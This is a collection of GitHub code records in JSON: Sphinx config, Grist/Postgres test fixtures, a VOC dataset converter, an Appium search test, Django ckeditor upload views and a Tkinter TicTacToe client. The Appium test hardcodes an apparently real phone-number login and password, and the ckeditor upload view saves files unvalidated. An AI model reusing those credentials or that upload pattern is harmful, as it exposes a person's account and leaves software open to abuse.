document tree into LaTeX files. List of tuples\n# (source start file, target name, title, author, documentclass [howto/manual]).\nlatex_documents = [('index', 'edapi.tex', 'edapi Documentation',\n '@dip @tosako @agrebneva @dwu', 'manual'),\n ]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n\n# -- Options for manual page output --------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'edapi', 'edapi Documentation',\n ['@dip @tosako @agrebneva @dwu'], 1)\n]\n\n# If true, show URL addresses after external links.\n#man_show_urls = False\n\n\n# -- Options for Texinfo output ------------------------------------------------\n\n# Grouping the document tree into Texinfo files. 
List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [('index', 'edapi', 'edapi Documentation',\n '@dip @tosako @agrebneva @dwu', 'edapi', 'One line description of project.',\n 'Miscellaneous'),\n ]\n\n# Documents to append as an appendix to all manuals.\n#texinfo_appendices = []\n\n# If false, no module index is generated.\n#texinfo_domain_indices = True\n\n# How to display URL addresses: 'footnote', 'no', or 'inline'.\n#texinfo_show_urls = 'footnote'\n\n# If true, do not generate a @detailmenu in the \"Top\" node's menu.\n#texinfo_no_detailmenu = False\n", "repo_name": "SmarterApp/RDW_DataWarehouse", "sub_path": "edapi/docs/conf.py", "file_name": "conf.py", "file_ext": "py", "file_size_in_byte": 6457, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.simplefilter", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 64, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}]}
+{"seq_id": "14382680878", "text": "from test.defaults import (GRIST_API_KEY, GRIST_DOC_ID,\n GRIST_SERVER_FROM_LOCAL, GRIST_SERVER_FROM_POSTGRES,\n POSTGRES_HOST, POSTGRES_PASSWORD, POSTGRES_PORT,\n POSTGRES_USER)\n\nimport psycopg2\nimport pytest\nfrom grist_api import GristDocAPI\n\n\n@pytest.fixture\ndef conn():\n \"\"\"\n Connection to postgres with multicorn and gristfdw installed\n \"\"\"\n with psycopg2.connect(f\"postgres://{POSTGRES_USER}:{POSTGRES_PASSWORD}@{POSTGRES_HOST}:{POSTGRES_PORT}\") as c:\n\n with c.cursor() as cur:\n cur.execute(\"\"\"\n CREATE EXTENSION IF NOT EXISTS multicorn;\n \"\"\")\n\n yield c\n\n\n@pytest.fixture\ndef server(conn):\n \"\"\"\n Sets up our external server in postgres\n \"\"\"\n with conn.cursor() as cur:\n cur.execute(f\"DROP SERVER IF EXISTS test\")\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"\n CREATE SERVER test FOREIGN DATA WRAPPER multicorn OPTIONS (\n wrapper 'gristfdw.GristForeignDataWrapper',\n api_key '{GRIST_API_KEY}',\n doc_id '{GRIST_DOC_ID}',\n server '{GRIST_SERVER_FROM_POSTGRES}'\n );\n \"\"\")\n\n yield \"test\"\n\n with conn.cursor() as cur:\n cur.execute(f\"DROP SERVER IF EXISTS test CASCADE\")\n\n\n@pytest.fixture\ndef schema(conn):\n name = \"gristfdw_schema\"\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"DROP SCHEMA IF EXISTS {name};\"\"\")\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"CREATE SCHEMA {name};\"\"\")\n\n yield name\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"DROP SCHEMA IF EXISTS {name} CASCADE;\"\"\")\n\n\n@pytest.fixture\ndef simple_table(conn, server, table_name):\n\n with conn.cursor() as cur:\n cur.execute(\"DROP FOREIGN TABLE IF EXISTS \\\"{table_name}\\\"\")\n with conn.cursor() as cur:\n cur.execute(f\"\"\"\n CREATE FOREIGN TABLE \\\"{table_name}\\\" (\n id BIGINT,\n col1 TEXT,\n col2 FLOAT,\n col3 BIGINT,\n col4 BOOLEAN,\n col5 DATE,\n col9 BIGINT,\n col10 BIGINT[]\n )\n SERVER {server}\n OPTIONS (table_name '{table_name}')\n \"\"\")\n yield\n with conn.cursor() as cur:\n cur.execute(\"DROP FOREIGN TABLE IF EXISTS \\\"{table_name}\\\" CASCADE\")\n\n\n@pytest.fixture\ndef grist_api(monkeypatch):\n monkeypatch.setenv(\"GRIST_API_KEY\", GRIST_API_KEY)\n return GristDocAPI(GRIST_DOC_ID, server=GRIST_SERVER_FROM_LOCAL)\n\n\n@pytest.fixture\ndef assert_grist_table(table_name, grist_api):\n def inner(expected):\n actual = grist_api.fetch_table(table_name)\n\n # Convert namedtuples to dicts\n # Filter out gristHelper_display, which is for reference columns\n actual_asdict = [\n {\n k: v\n for k, v in t._asdict().items()\n if not k.startswith(\"gristHelper_Display\")\n }\n for t in actual\n ]\n\n assert actual_asdict == expected\n\n return inner\n", "repo_name": "johncant/gristfdw", "sub_path": "test/fixtures/integration.py", "file_name": "integration.py", "file_ext": "py", "file_size_in_byte": 3107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycopg2.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "test.defaults.POSTGRES_USER", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_PASSWORD", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_HOST", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_PORT", "line_number": 16, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 11, "usage_type": "attribute"}, {"api_name": "test.defaults.GRIST_API_KEY", "line_number": 38, "usage_type": 
"name"}, {"api_name": "test.defaults.GRIST_DOC_ID", "line_number": 39, "usage_type": "name"}, {"api_name": "test.defaults.GRIST_SERVER_FROM_POSTGRES", "line_number": 40, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 66, "usage_type": "attribute"}, {"api_name": "test.defaults.GRIST_API_KEY", "line_number": 93, "usage_type": "argument"}, {"api_name": "grist_api.GristDocAPI", "line_number": 94, "usage_type": "call"}, {"api_name": "test.defaults.GRIST_DOC_ID", "line_number": 94, "usage_type": "argument"}, {"api_name": "test.defaults.GRIST_SERVER_FROM_LOCAL", "line_number": 94, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 91, "usage_type": "attribute"}, {"api_name": "grist_api.fetch_table", "line_number": 100, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 97, "usage_type": "attribute"}]}
+{"seq_id": "69973733929", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport xml.etree.ElementTree as ET\n\n\nclasses_name = [\n \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\",\n \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\",\n \"sheep\", \"sofa\", \"train\",\"tvmonitor\"\n]\n\nclasses_num = {\n 'aeroplane': 0, 'bicycle': 1, 'bird': 2, 'boat': 3, 'bottle': 4,\n 'bus': 5, 'car': 6, 'cat': 7, 'chair': 8, 'cow': 9, 'diningtable': 10,\n 'dog': 11, 'horse': 12, 'motorbike': 13, 'person': 14, 'pottedplant': 15,\n 'sheep': 16, 'sofa': 17, 'train': 18, 'tvmonitor': 19\n}\n\nDATA_ROOT = \"/Volumes/projects/DataSets/VOC\"\nDATA_PATH = os.path.join(DATA_ROOT, \"VOCdevkit/\")\nOUTPUT_PATH = os.path.join(DATA_ROOT, \"pascal_voc_{}.txt\")\n\n\ndef parse_xml(xml_file, year=2007):\n \"\"\"\n Args:\n xml_file: the input xml file path\n\n Returns:\n image_path: string\n labels: list of [xmin, ymin, xmax, ymax, class]\n \"\"\"\n tree = ET.parse(xml_file)\n root = tree.getroot()\n image_path = ''\n labels = []\n\n for item in root:\n if item.tag == 'filename':\n if year == 2007:\n image_path = os.path.join(\n DATA_PATH, 'VOC2007/JPEGImages', item.text)\n if year == 2012:\n image_path = os.path.join(\n DATA_PATH, 'VOC2012/JPEGImages', item.text)\n elif item.tag == 'object':\n obj_name = item[0].text\n obj_num = classes_num[obj_name]\n bndbox = item.find(\"bndbox\")\n xmin = int(float(bndbox.find(\"xmin\").text))\n ymin = int(float(bndbox.find(\"ymin\").text))\n xmax = int(float(bndbox.find(\"xmax\").text))\n ymax = int(float(bndbox.find(\"ymax\").text))\n labels.append([xmin, ymin, xmax, ymax, obj_num])\n\n return image_path, labels\n\n\ndef convert_to_string(image_path, labels):\n out_string = ''\n out_string += image_path\n for label in labels:\n for i in label:\n out_string += ' ' + str(i)\n out_string += '\\n'\n\n return out_string\n\n\ndef run_main(year=2007):\n print(\"Start format voc {} data !\".format(year))\n out_file = open(OUTPUT_PATH.format(year), \"w\")\n if year == 2007:\n xml_dir = os.path.join(DATA_PATH, \"VOC2007/Annotations/\")\n if year == 2012:\n xml_dir = os.path.join(DATA_PATH, \"VOC2012/Annotations/\")\n\n xml_list = os.listdir(xml_dir)\n\n xml_list = [xml_dir + tmp for tmp in xml_list]\n for xml in xml_list:\n if not os.path.isfile(xml):\n print(\"{} not xml file path.\".format(xml))\n image_path, labels = parse_xml(xml, year=year)\n record = convert_to_string(image_path, labels)\n out_file.write(record)\n out_file.close()\n\nif __name__ == '__main__':\n run_main(year=2007)\n run_main(year=2012)\n", "repo_name": "liuguiyangnwpu/DL.EyeSight", "sub_path": "Others/voc/process_pascal_voc.py", "file_name": "process_pascal_voc.py", "file_ext": "py", "file_size_in_byte": 2905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 49, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 37, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 82, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 85, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 86, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 86, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 87, "usage_type": "argument"}, {"api_name": "xml.etree.ElementTree", "line_number": 88, "usage_type": "argument"}]}
+{"seq_id": "18486014884", "text": "from common.desired_cadps import desired_conf\nfrom selenium.common.exceptions import NoSuchElementException\nimport logging\nfrom selenium.webdriver.common.by import By\nimport time\nimport random\nfrom page.login_page import login\n\n\nclass Home_page(login):\n # 首页入口搜索相关元素\n home_button = (By.ID, \"com.tal.kaoyan:id/mainactivity_button_calendar\")\n search_button = (By.ID, \"com.tal.kaoyan:id/imageSearch\")\n Input_button = (By.ID, \"com.tal.kaoyan:id/customsearchview_contentedittext\")\n SouSu_button = (By.XPATH, \"//*[@text='搜索']\")\n\n def Click_Home(self):\n \"\"\"点击首页入口元素\"\"\"\n self.click(self.home_button)\n\n def Click_Search(self):\n \"\"\"点击搜索框\"\"\"\n self.click(self.search_button)\n\n def Input_Search(self, text):\n \"\"\"输入搜索内容\"\"\"\n self.clear(self.Input_button)\n self.sendKeys(self.Input_button, text)\n\n def Click_Sousu(self):\n \"\"\"点击输入内容后的搜素按钮\"\"\"\n self.click(self.SouSu_button)\n\n # 搜索滑动用例流程\n def Search_Shake_Case(self, username, psw, text):\n self.psw_login(username, psw)\n self.Click_Home()\n time.sleep(2)\n logging.info(\"====My youstar_page returns to the search youstar_page====\")\n self.Click_Search()\n self.Input_Search(text)\n logging.info(\"====Enter search content:%s====\" % text)\n self.getScreenShot(text)\n self.Click_Sousu()\n logging.info(\"====Search content succeeded===\")\n self.getScreenShot(\"Search content succeeded\")\n self.Search_swipe()\n self.Check_Search()\n\n # 滑动两次方法封装,后续用例根据自己需求封装\n def Search_swipe(self):\n for i in range(2):\n self.Swipe_left()\n logging.info(\"=====Swipe left:\" + str(i + 1) + \"次=====\")\n time.sleep(2)\n for i in range(2):\n self.Swipe_right()\n logging.info(\"=====Swipe right:\" + str(i + 1) + \"次=====\")\n time.sleep(2)\n self.getScreenShot(\"Swipe right\" + str(i + 1) + \"次\")\n for i in range(2):\n self.Swipe_Up()\n logging.info(\"=====Swipe Up:\" + str(i + 1) + \"次=====\")\n time.sleep(1)\n self.getScreenShot(\"Swipe Up\" + str(i + 1) + \"次\")\n for i in range(2):\n self.Swipe_Down()\n logging.info(\"=====Swipe Down\" + str(i + 1) + \"次=====\")\n time.sleep(1)\n self.getScreenShot(\"Swipe Down\" + str(i + 1) + \"次\")\n\n # 校验头像更换是否跟换成功,做unittest需要校验是否成功\n def Check_Search(self):\n try:\n self.findElement(self.SouSu_button)\n logging.info(\"校验元素成功!:%s\" % str(self.SouSu_button))\n return True\n\n except NoSuchElementException:\n logging.info(\"没有找到校验元素:%s\" % str(self.SouSu_button))\n return False\n\n\nif __name__ == '__main__':\n driver = desired_conf()\n L = Home_page(driver)\n L.Search_Shake_Case(username=\"13632721415\", psw=\"Chuiling@950720\", text=\"心理学\")", "repo_name": "qangcheng/-appium-test", "sub_path": "page/Home_page.py", "file_name": "Home_page.py", "file_ext": "py", "file_size_in_byte": 3136, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "page.login_page.login", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 12, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 12, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 14, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 14, "usage_type": "name"}, {"api_name": 
"selenium.webdriver.common.by.By.XPATH", "line_number": 15, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 54, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 63, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 76, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 79, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 80, "usage_type": "call"}, {"api_name": "common.desired_cadps.desired_conf", "line_number": 85, "usage_type": "call"}]}
+{"seq_id": "18071163082", "text": "from msrest.serialization import Model\n\n\nclass AclList(Model):\n \"\"\"A Data Lake Analytics catalog access control list (ACL).\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :ivar value: the access control list (ACL).\n :vartype value: list[~azure.mgmt.datalake.analytics.catalog.models.Acl]\n \"\"\"\n\n _validation = {\n 'value': {'readonly': True},\n }\n\n _attribute_map = {\n 'value': {'key': 'value', 'type': '[Acl]'},\n }\n\n def __init__(self):\n super(AclList, self).__init__()\n self.value = None\n", "repo_name": "AntObr/credit-to-customer", "sub_path": "env/lib/python2.7/site-packages/azure/mgmt/datalake/analytics/catalog/models/acl_list.py", "file_name": "acl_list.py", "file_ext": "py", "file_size_in_byte": 594, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "msrest.serialization.Model", "line_number": 4, "usage_type": "name"}]}
+{"seq_id": "39513327929", "text": "import os\nfrom typing import Any, Callable, List, Optional, Set\n\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom posthog.utils import str_to_bool\n\n__all__ = [\"get_from_env\", \"get_list\", \"str_to_bool\"]\n\n\ndef get_from_env(\n key: str,\n default: Any = None,\n *,\n optional: bool = False,\n type_cast: Optional[Callable] = None,\n) -> Any:\n value = os.getenv(key)\n if value is None or value == \"\":\n if optional:\n return None\n if default is not None:\n return default\n else:\n raise ImproperlyConfigured(f'The environment variable \"{key}\" is required to run PostHog!')\n if type_cast is not None:\n return type_cast(value)\n return value\n\n\ndef get_list(text: str) -> List[str]:\n if not text:\n return []\n return [item.strip() for item in text.split(\",\")]\n\n\ndef get_set(text: str) -> Set[str]:\n if not text:\n return set()\n return {item.strip() for item in text.split(\",\")}\n", "repo_name": "PostHog/posthog", "sub_path": "posthog/settings/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14422, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Any", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 16, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "django.core.exceptions.ImproperlyConfigured", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "38765849516", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom . import utils\nfrom . import settings as ck_settings\n\n\n@csrf_exempt\ndef upload(request):\n \"\"\"\n Uploads a file and send back its URL to CKEditor.\n\n TODO:\n Validate uploads\n \"\"\"\n # Get the uploaded file from request.\n upload = request.FILES['upload']\n\n # Open output file in which to store upload.\n upload_filename = utils.get_upload_filename(upload.name, request.user)\n out = open(upload_filename, 'wb+')\n\n # Iterate through chunks and write to destination.\n for chunk in upload.chunks():\n out.write(chunk)\n out.close()\n\n url = utils.create_thumbnail(upload_filename)\n\n # Respond with Javascript sending ckeditor upload url.\n return HttpResponse(\"\"\"\n \"\"\" % (request.GET['CKEditorFuncNum'], url))\n\n\ndef browse(request):\n return render_to_response('browse.html', RequestContext(request, {\n 'images': utils.get_image_browse_urls(request.user),\n }))\n\n\ndef configs(request):\n merged_configs = {}\n if ck_settings.CONFIGS is not None:\n for config_name, config in ck_settings.CONFIGS.iteritems():\n merged_configs[config_name] = utils.validate_config(config_name)\n\n return render_to_response('ckeditor/configs.js', RequestContext(request, {\n 'debug': ck_settings.CKEDITOR_DEBUG,\n 'timestamp': ck_settings.TIMESTAMP,\n 'merged_configs': utils.pretty_json_encode(merged_configs),\n 'jquery_override_val': utils.json_encode(ck_settings.JQUERY_OVERRIDE_VAL),\n }), mimetype=\"application/x-javascript\")\n\n\n@csrf_exempt\ndef fb_upload(request):\n \"\"\"\n A wrapper around django-filebrowser's file upload view. 
It returns a\n javascript function call to CKEDITOR.tools.callFunction(), which\n CKEDITOR expects.\n \"\"\"\n try:\n import filebrowser\n except ImportError:\n raise Exception(\"Filebrowser not installed\")\n\n upload_file_view = None\n\n try:\n from filebrowser.sites import site\n except ImportError:\n pass\n else:\n upload_file_view = site._upload_file\n\n if upload_file_view is None:\n try:\n from filebrowser.views import _upload_file\n except ImportError:\n raise Exception(\n \"django-filebrowser must be version 3.3.0 or greater; \"\n \"currently at version %s\" % filebrowser.VERSION)\n else:\n upload_file_view = _upload_file\n\n # Create a dict on the request object that will be modified by the\n # filebrowser_post_upload signal receiver in ckeditor/models.py\n fb_data = request._fb_data = {}\n\n # Call original view function.\n # Within this function, the filebrowser_post_upload signal will be sent,\n # and our signal receiver will add the filebrowser.base.FileObject\n # instance to request._fb_data[\"upload_file\"]\n upload_file_view(request)\n\n upload_file = fb_data.get('upload_file')\n if not upload_file:\n return HttpResponse(\"Error uploading file\")\n\n return HttpResponse(\"\"\"\n \"\"\" % (request.GET['CKEditorFuncNum'], upload_file.url))\n", "repo_name": "mickael9/django-ckeditor", "sub_path": "ckeditor/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3429, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.http.HttpResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 10, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 40, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 40, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 51, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 51, "usage_type": "call"}, {"api_name": "filebrowser.sites.site._upload_file", "line_number": 78, "usage_type": "attribute"}, {"api_name": "filebrowser.sites.site", "line_number": 78, "usage_type": "name"}, {"api_name": "filebrowser.VERSION", "line_number": 86, "usage_type": "attribute"}, {"api_name": "filebrowser.views._upload_file", "line_number": 88, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 102, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 104, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 59, "usage_type": "name"}]}
+{"seq_id": "18028367829", "text": "import threading\r\nimport json\r\nimport socket\r\nimport tkinter as tk\r\nimport config\r\n\r\nip = config.get_ip()\r\n\r\n\r\nclass TicTacToe_client:\r\n def __init__(self, port, name, root):\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sock.connect((ip, port))\r\n self.sock.send(json.dumps(name).encode('utf-8'))\r\n self.width = 300\r\n self.height = 400\r\n self.btn_list = []\r\n self.root = tk.Toplevel(root)\r\n self.root.geometry(str(self.width) + 'x' + str(self.height))\r\n self.root.title('TicTacToe')\r\n self.root.resizable(False, False)\r\n self.root.protocol(\"WM_DELETE_WINDOW\", self.give_up)\r\n\r\n self.c = tk.Canvas(self.root)\r\n self.c.configure(height=self.height, width=self.width, bg='gray')\r\n self.c.pack()\r\n\r\n def give_up(self):\r\n self.sock.send(json.dumps('**||GIVEUP||**').encode('utf-8'))\r\n self.root.destroy()\r\n\r\n\r\n def draw_empty_board(self):\r\n # Creating a 3x3 table\r\n self.c.create_rectangle(0, 0, 300, 100, fill='black')\r\n self.c.create_text(150, 50, text='TicTacToe', font=('Jokerman', 30), fill='white', tags='text')\r\n for i in range(1, 4):\r\n self.c.create_line(0, 100 + i * 100, self.width, 100 + i * 100)\r\n self.c.create_line(i * 100, 100, i * 100, self.height)\r\n\r\n def val_btn(self, num):\r\n row = num // 3\r\n col = num % 3\r\n self.sock.send(json.dumps((row, col)).encode('utf-8'))\r\n\r\n def create_btns(self):\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(0),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(1),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(2),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(3),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(4),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(5),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(6),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(7),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n btn = tk.Button(self.root, text='', height=6, width=13, bg='light gray', command=lambda: self.val_btn(8),\r\n state='disabled')\r\n self.btn_list.append(btn)\r\n\r\n def drawGame(self, game_grid):\r\n self.c.delete('all')\r\n self.draw_empty_board()\r\n\r\n for row in range(3):\r\n for col in range(3):\r\n if game_grid[row][col] == 0:\r\n self.c.create_window(col * 100 + 50, 150 + row * 100, window=self.btn_list[row * 3 + col])\r\n elif game_grid[row][col] == 1:\r\n self.c.create_oval(col * 100 + 20, 120 + row * 100, 80 + col * 100, 180 + row * 100, width=2)\r\n elif game_grid[row][col] == 2:\r\n self.c.create_line(col * 100, 200 + row * 100, 100 + col * 100, 100 + row * 100, width=2,\r\n fill='black')\r\n self.c.create_line(col * 100, 100 + row * 100, 100 + col * 100, 200 + row * 100, 
width=2,\r\n fill='black')\r\n\r\n def draw_win_line(self, key):\r\n if key[-3:] == '--0':\r\n self.c.delete('text')\r\n self.c.create_text(150, 50, text='DRAW', font=('chiller', 40), fill='white')\r\n return\r\n key = key[4:]\r\n if key[0] == 'R':\r\n self.c.create_line(0, 150 + int(key[1]) * 100, self.width, 150 + int(key[1]) * 100, fill='red', width=4)\r\n elif key[0] == 'C':\r\n self.c.create_line(50 + int(key[1]) * 100, 100, 50 + int(key[1]) * 100, 400, fill='red', width=4)\r\n elif key[0:2] == 'DL':\r\n self.c.create_line(0, 100, 300, 400, fill='red', width=4)\r\n elif key[0:2] == 'DR':\r\n self.c.create_line(0, 400, 300, 100, fill='red', width=4)\r\n self.c.delete('text')\r\n string = key[2:] + ' Wins'\r\n self.c.create_text(150, 50, text=string, font=('chiller', 30), fill='white')\r\n\r\n def shut_down(self):\r\n self.root.destroy()\r\n\r\n def play_game(self):\r\n while True:\r\n received = False\r\n while not received:\r\n try:\r\n game_board = json.loads(self.sock.recv(4096).decode('utf-8'))\r\n received = True\r\n except json.decoder.JSONDecodeError:\r\n pass\r\n print(game_board)\r\n if game_board == 'move':\r\n self.c.delete('wait')\r\n self.c.create_text(300, 100, text='YOUR TURN', anchor='se', font=('Times New Roman', 12), fill='cyan', tag='move')\r\n for i in range(9):\r\n self.btn_list[i].configure(state='normal')\r\n elif game_board[:4] == 'OVER':\r\n self.c.delete('move')\r\n self.c.delete('wait')\r\n self.root.protocol(\"WM_DELETE_WINDOW\", self.shut_down)\r\n self.draw_win_line(game_board)\r\n break\r\n else:\r\n for i in range(9):\r\n self.btn_list[i].configure(state='disabled')\r\n self.c.delete('move')\r\n self.c.create_text(300, 100, text='WAIT', anchor='se', font=('Times New Roman', 12), fill='red', tag='wait')\r\n self.drawGame(game_board)\r\n\r\n def run(self):\r\n self.draw_empty_board()\r\n self.create_btns()\r\n self.drawGame([[0, 0, 0], [0, 0, 0], [0, 0, 0]])\r\n\r\n play = threading.Thread(target=self.play_game)\r\n play.start()\r\n\r\n # self.root.mainloop()\r\n", "repo_name": "AR-PyT/Gaming-Platform-with-Integrated-Chat", "sub_path": "tictactoe_client.py", "file_name": "tictactoe_client.py", "file_ext": "py", "file_size_in_byte": 6592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.get_ip", "line_number": 7, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 12, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 12, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 12, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}, {"api_name": "tkinter.Toplevel", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.Canvas", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 29, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 44, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 50, 